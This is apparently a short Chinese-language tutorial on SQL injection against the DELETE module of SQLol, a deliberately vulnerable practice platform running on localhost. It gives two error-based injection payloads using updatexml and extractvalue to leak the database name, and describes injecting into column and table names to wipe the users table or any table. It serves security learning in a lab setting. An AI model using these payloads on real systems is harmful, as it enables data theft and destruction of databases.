SQL注入測試平台 SQLol -5.DELETE注入測試

　　通路首頁的delete子產品，http://127.0.0.1/sql/delete.php，開始對delete子產品進行測試。

delete文法：

DELETE FROM 【users】 WHERE 【username】 = 【'1'】
      

　　

幾個位置都可能存在注入，這裡隻示範一種。

下面示範注入到不同位置的方法。

一、String in WHERE clause

構造POC：

' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
      

擷取資料庫

二、Integer in WHERE clause

構造POC:

'' or extractvalue(1,concat(0x7e,database())) or ''
      

三、Column Name

注入點在【1】處

DELETE FROM users WHERE 【1】 = 1 

利用方式：

1、清空users表

2、構造報錯注入語句

四、Table Name

DELETE FROM 1 WHERE isadmin = 0 

1、清空任意表

2、構造報錯，爆出資料